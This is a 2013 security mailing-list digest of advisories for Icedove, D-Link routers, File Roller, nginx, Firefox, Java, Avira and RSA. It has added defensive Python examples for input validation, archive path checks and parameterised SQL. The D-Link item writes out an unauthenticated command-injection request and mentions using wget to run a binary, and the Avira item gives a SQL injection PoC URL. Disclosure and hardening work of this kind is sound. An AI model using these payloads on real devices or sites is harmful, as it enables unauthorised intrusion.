[SECURITY] [DSA 2720-1] icedove security update

2013-07-08 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2720-1                   secur...@debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
July 06, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: icedove
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 
 CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 
 CVE-2013-1694 CVE-2013-1697

Multiple security issues have been found in Icedove, Debian's version
of the Mozilla Thunderbird mail and news client. Multiple memory safety 
errors, use-after-free vulnerabilities, missing permission checks, incorrect 
memory handling and other implementation errors may lead to the execution
of arbitrary code, privilege escalation, information disclosure or
cross-site request forgery.

As already announced for Iceweasel: We're changing the approach for
security updates for Icedove in stable-security: Instead of
backporting security fixes, we now provide releases based on the 
Extended Support Release branch. As such, this update introduces
packages based on Thunderbird 17 and at some point in the future we 
will switch to the next ESR branch once ESR 17 has reached its end 
of life.

Some Icedove extensions currently packaged in the Debian archive are 
not compatible with the new browser engine. Up-to-date and compatible 
versions can be retrieved from http://addons.mozilla.org as a short 
term solution.

An updated and compatible version of enigmail is included with this 
update.

The icedove version in the oldstable distribution (squeeze) is no
longer supported with full security updates. However, it should be
noted that almost all security issues in Icedove stem from the
included browser engine. These security problems only affect Icedove
if scripting and HTML mails are enabled. If there are security issues
specific to Icedove (e.g. a hypothetical buffer overflow in the IMAP
implementation) we'll make an effort to backport such fixes to oldstable.

For the stable distribution (wheezy), these problems have been fixed in
version 17.0.7-1~deb7u1.

For the unstable distribution (sid), these problems have been fixed in
version 17.0.7-1.

We recommend that you upgrade your icedove packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHYOV0ACgkQXm3vHE4uyloU2wCg4l3I0e41UASWhsFC7D9BSuiH
cxIAn24DJFsYpSO7f8p3EH8TcCD800CC
=fQYl
-END PGP SIGNATURE-



OS-Command Injection via UPnP Interface in multiple D-Link devices

2013-07-08 Thread devnull
Vendor: D-Link
Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865 / DAP1522

 Vulnerable Firmware Releases: 
DIR-300 rev B - 2.14b01
DIR-600 - 2.16b01
DIR-645 - 1.04b01
DIR-845 - 1.01b02
DIR-865 - 1.05b03

Other devices and firmware versions may be also vulnerable.

 Vulnerability Overview: 

 * Unauthenticated OS Command Injection 

The vulnerability is caused by missing input validation in different XML 
parameters. This vulnerability could be exploited to inject and execute 
arbitrary shell commands.

WARNING: You do not need to be authenticated to the device to insert and 
execute malicious commands.
Hint: On different devices wget is preinstalled and you are able to upload and 
execute your malicious binary.

= Parameter: NewInternalClient, NewExternalPort, NewInternalPort

Example Request:
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Host: 10.8.28.133:49152
Content-Type: text/xml
Content-Length: 649

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" 
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewPortMappingDescription></NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewInternalClient>`COMMAND`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewExternalPort>634</NewExternalPort>
<NewRemoteHost></NewRemoteHost>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>45</NewInternalPort>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


You could use miranda for your own testing:

* NewInternalClient
Required argument:
Argument Name:  NewInternalClient
Data Type:  string
Allowed Values: []
Set NewInternalClient value to: `ping 192.168.0.100`

* NewExternalPort
Required argument:
Argument Name:  NewExternalPort
Data Type:  ui2
Allowed Values: []
Set NewExternalPort value to: `ping 192.168.0.100`

* NewInternalPort
Required argument:
Argument Name:  NewInternalPort
Data Type:  ui2
Allowed Values: []
Set NewInternalPort value to: `ping 192.168.0.100`

Screenshot: 
http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png

 Solution 

DIR-300 rev B - disable UPnP
DIR-600 - update to v2.17b01
DIR-645 - update to v1.04b11
DIR-845 - update to v1.02b03
DIR-865 - disable UPnP

 Credits 

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

 Time Line: 

06.06.2013 - discovered vulnerability
07.06.2013 - reported vulnerability to vendor
= some fixes are available but there is no communication with the vendor
06.07.2013 - public disclosure at Sigint 2013
06.07.2013 - public disclosure of advisory

= Advisory end =
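The advisory boils down to one missing step: the SOAP arguments were handed to a shell without ever being checked against the types the UPnP service description assigns them (NewInternalClient is a LAN address, the two ports are ui2). The block below is an added example, not code from the advisory or from D-Link's firmware: it parses an AddPortMapping body shaped like the request above, type-checks every argument, and only then builds a command as an argv list so no shell ever sees the values. The `make_body` helper, the sample bodies, the `samples`-free argument table and the iptables command shape are all assumptions for illustration; the real command the firmware runs is not known from the advisory.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

# Namespaces used by the request quoted in the advisory.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
SERVICE_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"

# The eight AddPortMapping arguments (WANIPConnection:1 service description).
ARG_NAMES = ("NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort",
             "NewInternalClient", "NewEnabled", "NewPortMappingDescription",
             "NewLeaseDuration")


def make_body(internal_client, external_port="634", internal_port="45", proto="TCP"):
    """Constructed SOAP body in the shape of the advisory's example request."""
    return (
        '<?xml version="1.0"?>'
        f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}"><SOAP-ENV:Body>'
        f'<m:AddPortMapping xmlns:m="{SERVICE_NS}">'
        '<NewPortMappingDescription></NewPortMappingDescription>'
        '<NewLeaseDuration></NewLeaseDuration>'
        f'<NewInternalClient>{internal_client}</NewInternalClient>'
        '<NewEnabled>1</NewEnabled>'
        f'<NewExternalPort>{external_port}</NewExternalPort>'
        '<NewRemoteHost></NewRemoteHost>'
        f'<NewProtocol>{proto}</NewProtocol>'
        f'<NewInternalPort>{internal_port}</NewInternalPort>'
        '</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>'
    )


BENIGN_BODY = make_body("192.168.0.10")                    # constructed, legitimate
MALICIOUS_BODY = make_body("`ping 192.168.0.100`")        # the advisory's payload


def parse_add_port_mapping(body):
    """Return {argument name: text} for an AddPortMapping request (None if absent)."""
    root = ET.fromstring(body)
    action = root.find(f"{{{SOAP_NS}}}Body/{{{SERVICE_NS}}}AddPortMapping")
    if action is None:
        raise ValueError("not an AddPortMapping request")
    args = {}
    for name in ARG_NAMES:          # argument elements are unqualified in UPnP
        el = action.find(name)
        args[name] = None if el is None else (el.text or "")
    return args


_SHELL_META = re.compile(r"[`$;|&<>(){}\\\n\r'\"]")


def has_shell_metachars(value):
    """The check the firmware lacked. Handy as a logging/IDS signal, but it is a
    denylist; the validator below checks the declared types instead."""
    return bool(value) and _SHELL_META.search(value) is not None


def _uint(value, bits):
    return (value is not None and re.fullmatch(r"[0-9]{1,10}", value) is not None
            and int(value) < (1 << bits))


def _ipv4(value):
    try:
        if not isinstance(value, str):
            return False
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def validate_add_port_mapping(args):
    """Return the names of arguments that fail their type check (empty list = OK)."""
    bad = []
    if args["NewRemoteHost"] and not _ipv4(args["NewRemoteHost"]):
        bad.append("NewRemoteHost")
    if not _uint(args["NewExternalPort"], 16):
        bad.append("NewExternalPort")
    if args["NewProtocol"] not in ("TCP", "UDP"):
        bad.append("NewProtocol")
    if not _uint(args["NewInternalPort"], 16) or args["NewInternalPort"] == "0":
        bad.append("NewInternalPort")
    if not _ipv4(args["NewInternalClient"]):     # a LAN address and nothing else
        bad.append("NewInternalClient")
    if args["NewEnabled"] not in ("0", "1"):
        bad.append("NewEnabled")
    if not _uint(args["NewLeaseDuration"] or "0", 32):   # empty means 'no lease'
        bad.append("NewLeaseDuration")
    return bad


def build_dnat_argv(args):
    """Assumed shape of the command that installs the mapping. Validated values
    become separate argv entries (subprocess-style execution), never a shell string."""
    bad = validate_add_port_mapping(args)
    if bad:
        raise ValueError(f"rejecting request, bad arguments: {bad}")
    return ["iptables", "-t", "nat", "-A", "PREROUTING",
            "-p", args["NewProtocol"].lower(), "--dport", args["NewExternalPort"],
            "-j", "DNAT", "--to-destination",
            f'{args["NewInternalClient"]}:{args["NewInternalPort"]}']


def accept_request(body):
    """Full gate: the argv to execute, or None when the request is rejected."""
    try:
        return build_dnat_argv(parse_add_port_mapping(body))
    except (ET.ParseError, ValueError):
        return None
```

Run against the two constructed bodies, the benign one yields an argv ending in `192.168.0.10:45` while the advisory's payload is refused with `NewInternalClient` named as the offending argument; putting the backtick payload into a port field is caught the same way by the ui2 check, which is why type validation beats a metacharacter denylist.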


[oCERT-2013-001] File Roller path sanitization errors

2013-07-08 Thread Daniele Bianco

#2013-001 File Roller path sanitization errors

Description:

The File Roller archive manager for the GNOME desktop suffers from a
path traversal vulnerability caused by insufficient path sanitization.

A specially crafted archive file can be used to trigger creation of
arbitrary files in any location, writable by the user executing the extraction,
outside the current working directory. This behaviour is triggered when the
option 'Keep directory structure' is selected from the application 'Extract'
dialog.

The issue is present on File Roller installations which have been
compiled with libarchive support, used to handle tar, cpio, lha, 7zip, ar
archiving formats and ISO images. The libarchive support is enabled by
default.

Affected version:
File Roller >= 3.6.0, >= 3.8.0, >= 3.9.1

Fixed version:
File Roller >= 3.6.4, >= 3.8.3, >= 3.9.3

Credit: vulnerability report received from Yorick Koster 
yorick.koster AT securify.nl

CVE: CVE-2013-4668

Timeline:
2013-05-16: vulnerability report received
2013-05-20: contacted File Roller maintainer
2013-05-27: maintainer provides patch for review
2013-05-28: reporter confirms patch effectiveness
2013-06-11: oCERT confirms patch effectiveness
2013-06-17: File Roller 3.9.3 released
2013-07-02: File Roller 3.6.4, 3.8.3 released
2013-07-04: contacted affected vendors
2013-07-04: assigned CVE
2013-07-08: advisory release

References:
http://fileroller.sourceforge.net
http://git.gnome.org/browse/file-roller
https://git.gnome.org/browse/file-roller/commit/?id=b147281293a8307808475e102a14857055f81631

Permalink:
http://www.ocert.org/advisories/ocert-2013-001.html

--
  Daniele Bianco  Open Source Computer Security Incident Response Team
  dan...@ocert.org  http://www.ocert.org

  GPG Key 0x9544A497
  GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D  4AC5 AE75 822E 9544 A497
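The class of bug above is the archive member whose name, once the extractor honours the stored directory structure, resolves outside the chosen destination. The following is an added example, not the File Roller fix (that is C, in the commit linked above): it shows the check an extractor needs, in Python on an in-memory tar built for the purpose. Names are normalised as POSIX paths, anything absolute or still climbing with `..` after normalisation is refused rather than rewritten, the resolved target is re-checked against the destination, and symlink and hardlink members are also checked on their link target. The archive contents, the `extract_here` destination and the member names are constructed for the demonstration.

```python
import io
import os
import posixpath
import tarfile


def resolve_inside(dest_dir, member_name):
    """Map an archive member name to its extraction path, or return None when it
    would land outside dest_dir. Archive names are '/'-separated, so they are
    normalised with posixpath: 'docs/sub/../notes.txt' becomes 'docs/notes.txt',
    while absolute names and names that still start with '..' are refused."""
    dest = os.path.realpath(dest_dir)
    name = member_name.replace("\\", "/")
    if not name or name.startswith("/"):
        return None
    norm = posixpath.normpath(name)
    if norm in (".", "..") or norm.startswith("../"):
        return None
    target = os.path.realpath(os.path.join(dest, *norm.split("/")))
    if os.path.commonpath([dest, target]) != dest:
        return None          # second line of defence on the resolved path
    return target


def check_archive(tar, dest_dir):
    """Partition members into accepted {name: target_path} and rejected [name].
    Symlink targets are resolved relative to the link's own directory, hardlink
    targets relative to the archive root; either escaping dest_dir is refused."""
    accepted, rejected = {}, []
    for m in tar.getmembers():
        target = resolve_inside(dest_dir, m.name)
        if target is None:
            rejected.append(m.name)
            continue
        if m.issym():
            link_target = posixpath.join(posixpath.dirname(m.name), m.linkname)
            if resolve_inside(dest_dir, link_target) is None:
                rejected.append(m.name)
                continue
        elif m.islnk() and resolve_inside(dest_dir, m.linkname) is None:
            rejected.append(m.name)
            continue
        accepted[m.name] = target
    return accepted, rejected


def build_sample_tar():
    """Constructed in-memory archive: two legitimate members, three traversal
    attempts and one symlink pointing above the extraction directory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tw:
        for name in ("docs/readme.txt", "docs/sub/../notes.txt",
                     "../../.bashrc", "/etc/cron.d/job", "docs/../../escape"):
            info = tarfile.TarInfo(name)
            data = b"payload\n"
            info.size = len(data)
            tw.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo("docs/link")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"
        tw.addfile(link)
    buf.seek(0)
    return tarfile.open(fileobj=buf, mode="r")


if __name__ == "__main__":
    ok, bad = check_archive(build_sample_tar(), "extract_here")
    print("accepted:", sorted(ok))
    print("rejected:", bad)
```

One caveat the name check alone does not cover: a later member may be written through a symlink that an earlier member of the same archive created (`docs/link` first, then `docs/link/payload`). A complete extractor either refuses symlinks outright or resolves each target path against the real filesystem at write time; for Python callers, `tarfile`'s `data_filter` (3.12, also backported to maintenance releases) implements both checks.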


[SECURITY] [DSA 2721-1] nginx security update

2013-07-08 Thread Nico Golde
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2721-1                   secur...@debian.org
http://www.debian.org/security/                                Nico Golde
July 07, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: nginx
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2070
Debian Bug : 708164

A buffer overflow has been identified in nginx, a small, powerful,
scalable web/proxy server, when processing certain chunked transfer
encoding requests if proxy_pass to untrusted upstream HTTP servers is
used.  An attacker may use this flaw to perform denial of service
attacks, disclose worker process memory, or possibly execute arbitrary
code.

The oldstable distribution (squeeze), is not affected by this problem.

For the stable distribution (wheezy), this problem has been fixed in
version 1.2.1-2.2+wheezy1.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.1-1.

We recommend that you upgrade your nginx packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



VUPEN Security Research - Mozilla Firefox Maintenance Service Privilege Escalation Vulnerabilities

2013-07-08 Thread VUPEN Security Research
VUPEN Security Research - Mozilla Firefox Maintenance Service Local
Privilege Escalation Vulnerabilities

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Mozilla Firefox is a free and open source web browser coordinated by
Mozilla Corporation and Mozilla Foundation. As of October 2012, Firefox
has approximately 20% to 24% of worldwide usage share of web browsers,
making it the third most used web browser. (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered high risk vulnerabilities
in Mozilla Firefox.

The vulnerabilities are caused by errors in the Mozilla Maintenance Service
on Windows when interacting with local software, which could allow local
unprivileged users to execute arbitrary code with SYSTEM privileges.

It is of course possible to combine these vulnerabilities with a remote
Firefox memory corruption to achieve a remote SYSTEM code execution.


III. AFFECTED PRODUCTS
---

Mozilla Firefox versions prior to 21.0
Mozilla Firefox ESR versions prior to 17.0.6
Mozilla Thunderbird versions prior to 17.0.6
Mozilla Thunderbird ESR versions prior to 17.0.6


IV. Binary Analysis & Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a private exploit will
be available through the VUPEN BAE (Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Upgrade to Mozilla Firefox 21.0 or ESR 17.0.6.

Upgrade to Mozilla Thunderbird or Thunderbird ESR 17.0.6


VII. CREDIT
--

This vulnerability was discovered by Richard L. of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://www.mozilla.org/security/announce/2013/mfsa2013-44.html
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

-**-** - Vulnerability Discovered by VUPEN
2013-05-14 - Vulnerability Fixed by Mozilla
2013-07-08 - Public disclosure



VUPEN Security Research - Oracle Java Preloader Click-2-Play Warning Bypass Vulnerability

2013-07-08 Thread VUPEN Security Research
VUPEN Security Research - Oracle Java Applet Preloader Click-2-Play
Warning Bypass Vulnerability

Website : http://www.vupen.com

Twitter : http://twitter.com/vupen


I. BACKGROUND
-

Java is the foundation for virtually every type of networked application
and is the global standard for developing and delivering mobile applications,
games, Web-based content, and enterprise software. (Oracle)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Oracle Java.

The vulnerability is caused by a design error in the Java click-2-play
security warning when the preloader is used, which can be exploited by
remote attackers to load a malicious applet (e.g. taking advantage of
a Java memory corruption vulnerability) without any user interaction.


III. AFFECTED PRODUCTS
---

Oracle Java version 7u21 and prior


IV. Binary Analysis & Exploits/PoCs
---

In-depth technical analysis of the vulnerability and a private exploit will
be available through the VUPEN BAE (Binary Analysis & Exploits) portal:

http://www.vupen.com/english/services/ba-index.php

VUPEN Binary Analysis & Exploits Service provides private exploits and
in-depth technical analysis of the most significant public vulnerabilities
based on disassembly, reverse engineering, protocol analysis, and code
audit.

The service allows governments and major corporations to evaluate risks, and
protect infrastructures and assets against new threats. The service also
allows security vendors (IPS, IDS, AntiVirus) to supplement their internal
research efforts and quickly develop both vulnerability-based and
exploit-based signatures to proactively protect their customers from attacks
and emerging threats.


V. VUPEN Threat Protection Program
---

Governments and major corporations which are members of the VUPEN Threat
Protection Program (TPP) have been proactively alerted about the vulnerability
when it was discovered by VUPEN in advance of its public disclosure, and
have received a detailed attack detection guidance to protect national and
critical infrastructures against potential 0-day attacks exploiting this
vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Upgrade to Java 7u25 or later.


VII. CREDIT
--

This vulnerability was discovered by Florent H. of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is the leading provider of defensive and offensive cybersecurity
intelligence and advanced vulnerability research. VUPEN solutions enable
corporations and governments to manage risks, and protect critical networks
and infrastructures against known and unknown vulnerabilities.

VUPEN solutions include:

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program (TPP) :
http://www.vupen.com/english/services/tpp-index.php


IX. REFERENCES
--

http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html
http://www.vupen.com/english/research.php


X. DISCLOSURE TIMELINE
-

-**-** - Vulnerability Discovered by VUPEN
2013-06-18 - Vulnerability Fixed in Java 7u25
2013-07-08 - Public disclosure



Avira Analysis Web Service - SQL Injection Vulnerability

2013-07-08 Thread Vulnerability Lab
Title:
==
Avira Analysis Web Service - SQL Injection Vulnerability


Date:
=
2013-07-08


References:
===
http://www.vulnerability-lab.com/get_content.php?id=997


VL-ID:
=
997


Common Vulnerability Scoring System:

8.5


Abstract:
=
The Vulnerability Laboratory Core Research Team discovered a critical SQL 
Injection vulnerability in the Avira Analysis online service application.


Report-Timeline:

2013-05-25:Vendor Notification
2013-05-26:Vendor Response/Feedback
2013-06-31:Vendor Fix/Patch
2013-07-08:Public Disclosure


Status:

Published


Affected Products:
==
Avira
Product: Analysis - Web Application & Online Service 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

A remote SQL Injection web vulnerability is detected in the official 
Avira Analysis online service application.
The vulnerability allows remote attackers to inject own sql commands to 
compromise the affected application dbms.

The SQL Injection vulnerability is located in the `overview` file when 
processing to request manipulated `uniqueid` parameter. 
By manipulation of the `uniqueid` parameter the attackers can inject own sql 
commands to compromise the webserver application dbms. 

When trying to bypass the filter validation by using a single quote 
or a double quote to check whether the parameter is vulnerable or not, 
attackers are redirected to another page, but when the attacker 
sends the request with a back-slash, the context is executed 
and new mysql errors become visible for exploitation.

The vulnerability can be exploited by remote attackers without privileged 
application user account and without required user interaction. 
Successful exploitation of the sql injection vulnerability results in web 
application and online service dbms compromise.

Vulnerable Module(s):
[+] en

Vulnerable File(s):
[+] overview

Vulnerable Parameter(s):
[+] uniqueid


Proof of Concept:
=
The remote sql injection web vulnerability can be exploited by remote attackers 
without privileged application user account and without 
required user interaction. For demonstration or reproduce ...

Vulnerable Service Domain:  analysis.avira.com
Vulnerable Module:  en
Vulnerable File:overview
Vulnerable Parameter:   uniqueid


Note: When trying to use a single quote or a double quote to check if the 
parameter is vulnerable or not, you will be redirected to another page, 
but when loading with a back-slash, new mysql errors will become 
visible for exploitation.


POC: 
https://analysis.avira.com/en/overview?start=0&uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!]


PoC Video:
http://www.youtube.com/watch?v=Odko5PTKA-Q


Reference(s):
https://analysis.avira.com/


Solution:
=
The vulnerability can be patched by a restriction and secure parse of the 
uniqueid parameter request.


Risk:
=
The security risk of the remote sql injection web vulnerability is estimated as 
critical.


Credits:

Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] 
(ebra...@evolution-sec.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
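The interesting detail in the report above is the detection trick: quotes are filtered (the request is redirected), but a trailing backslash gets through, and in MySQL's default mode a backslash inside a string literal escapes the following character, so the closing quote is swallowed and the statement breaks. The block below is an added example, not Avira's code and not Vulnerability Lab's: it models a quote-stripping filter in front of a string-built query, walks the resulting statement with MySQL's escaping rules to show why the literal is never closed, and then shows the hardened lookup, a whitelist on the `uniqueid` format plus a parameterised query. The query shape, the `samples` table, the column names and the `[A-Za-z0-9]{1,64}` format are assumptions; the sample id is the one in the PoC URL above; sqlite3 stands in for MySQL for the parameterised part.

```python
import re
import sqlite3
from typing import Optional

# Assumed shape of a valid uniqueid: the PoC value is 32 alphanumerics.
UNIQUEID_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def naive_filter(value: str) -> Optional[str]:
    """Models the behaviour reported above: requests carrying a quote are
    bounced (the caller redirects), everything else passes through unchanged."""
    if "'" in value or '"' in value:
        return None
    return value


def render_vulnerable_query(uniqueid: str) -> Optional[str]:
    """String-built query, the assumed shape of the vulnerable code path."""
    filtered = naive_filter(uniqueid)
    if filtered is None:
        return None
    return f"SELECT * FROM samples WHERE uniqueid = '{filtered}' AND start = 0"


def mysql_string_literals_balanced(sql: str) -> bool:
    """Scan the statement with MySQL's default rule that a backslash inside a
    quoted string escapes the next character. False means the last literal was
    never closed, i.e. the parser raises a syntax error: the 'new mysql errors'
    the report describes after sending a trailing backslash."""
    in_str = False
    i = 0
    while i < len(sql):
        c = sql[i]
        if in_str and c == "\\":
            i += 2                       # escaped character, whatever it is
            continue
        if c == "'":
            in_str = not in_str
        i += 1
    return not in_str


def build_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the service's DBMS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE samples (uniqueid TEXT PRIMARY KEY, verdict TEXT)")
    conn.execute("INSERT INTO samples VALUES (?, ?)",
                 ("1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg", "clean"))
    conn.commit()
    return conn


def hardened_lookup(conn: sqlite3.Connection, uniqueid: str) -> Optional[str]:
    """Reject anything outside the expected format outright (no 'sanitising'),
    then let the driver bind the value so it can never be parsed as SQL."""
    if not UNIQUEID_RE.fullmatch(uniqueid):
        return None
    row = conn.execute("SELECT verdict FROM samples WHERE uniqueid = ?",
                       (uniqueid,)).fetchone()
    return row[0] if row else None
```

With a quote the filter redirects; with `abc\` the rendered statement is `... uniqueid = 'abc\' AND start = 0`, whose literal is never closed, which is exactly the error-based signal the report used. The hardened lookup never gets that far: the backslash fails the format check before any SQL is built.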

Authentication bypass in D-Link routers

2013-07-08 Thread doylej . ia
Vendor: D-Link
Affected Products:
-DIR-505L SharePort Mobile Companion (HW: A1 / FW: 1.01)
-DIR-826L Wireless N600 Cloud Router (HW: A1 / FW: 1.02)
Vendor Notification: April 8, 2013
Public Disclosure: July 8, 2013
Vulnerability Type: Authentication Bypass
CVE Reference: CVE-2013-4772
Solution Status: Not Fixed
Credit: Jason Doyle / tw: jasond0yle

Advisory Details:
It is possible to bypass authentication to gain administrator level access to 
the web management console by navigating directly to any web page while a 
legitimate session is still active. This is not possible once a legitimate 
session has expired. During this window of opportunity, an attacker has 
unfettered access to view and change all configurable settings on the device, 
including the addition / modification of user accounts for persistent access.


ESA-2013-052: RSA(r) Authentication Manager Sensitive Information Disclosure Vulnerability

2013-07-08 Thread Security Alert

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ESA-2013-052: RSA® Authentication Manager Sensitive Information Disclosure 
Vulnerability


EMC Identifier: ESA-2013-052

CVE Identifier: CVE-2013-3273

Severity Rating: CVSS v2 Base Score: 6.6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)
 

Affected Products:

RSA Authentication Manager 7.1 all platforms, including Appliance 3.0
RSA Authentication Manager 8.0
 

Unaffected Products:

RSA Authentication Manager 6.1
 

Summary: 

Patch 26 (P26) for RSA Authentication Manager 7.1 Service Pack 4 (SP4) and 
Appliance 3.0 SP4 and Patch 2 (P2) for RSA Authentication Manager 8.0 contain a 
fix for a potential security vulnerability.
 

Details: 

If the RSA Authentication Manager Software Development Kit (SDK) is used to 
develop a custom application that connects with RSA Authentication Manager with 
trace logging set to verbose, the administrative account password used 
by the custom application appears in the trace log file as clear text.
 

Recommendation:

RSA strongly recommends that customers apply Patch 26 (for RSA Authentication 
Manager 7.1 SP4) or Patch 2 (for RSA Authentication Manager 8.0) at the 
earliest opportunity. Additionally, RSA recommends that after applying the 
patch, you create a new password for the administrative account used by the 
SDK-developed application. See release notes for further details.


Obtaining Downloads:

To obtain the latest RSA product downloads, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose download you want to obtain. Scroll to 
the section for the product download that you want and click on the link.

Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at 
https://knowledge.rsasecurity.com and click Products in the top navigation 
menu. Select the specific product whose documentation you want to obtain. 
Scroll to the section for the product version that you want and click the set 
link.

Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, 
“Security Advisories Severity Rating” at 
https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA 
recommends all customers take into account both the base score and any relevant 
temporal and environmental scores which may impact the potential severity 
associated with particular security vulnerability.

Obtaining More Information:

For more information about RSA products, visit the RSA web site at 
http://www.rsa.com.

Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA 
Customer Support center with any additional questions regarding this RSA 
SecurCare Note. For contact telephone numbers or e-mail addresses, log on to 
RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help > 
Contact, and then click the Contact Us - Phone tab or the Contact Us - Email 
tab.

General Customer Support Information:
http://www.rsa.com/node.aspx?id=1264

RSA SecurCare Online:
https://knowledge.rsasecurity.com

